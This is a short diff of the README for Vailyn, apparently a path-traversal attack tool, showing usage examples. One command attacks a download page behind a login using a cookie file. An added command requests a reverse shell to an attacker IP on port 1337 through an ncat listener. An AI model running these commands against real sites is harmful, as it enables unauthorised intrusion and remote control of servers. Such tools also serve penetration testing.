VainlyStrain/Vailyn/README.md

 * Attack, but target is behind login screen:
 `$ Vailyn -v "http://site.com/download.php" -a 1 -l dicts/files dicts/dirs -c cookie.txt`

+* Attack, but I want a reverse shell on port 1337:
+`$ Vailyn -v "http://site.com/download.php" -a 1 -l dicts/files dicts/dirs -j MY.IP.IS.XX 1337`
+(will start a ncat listener for you)

 ### Demo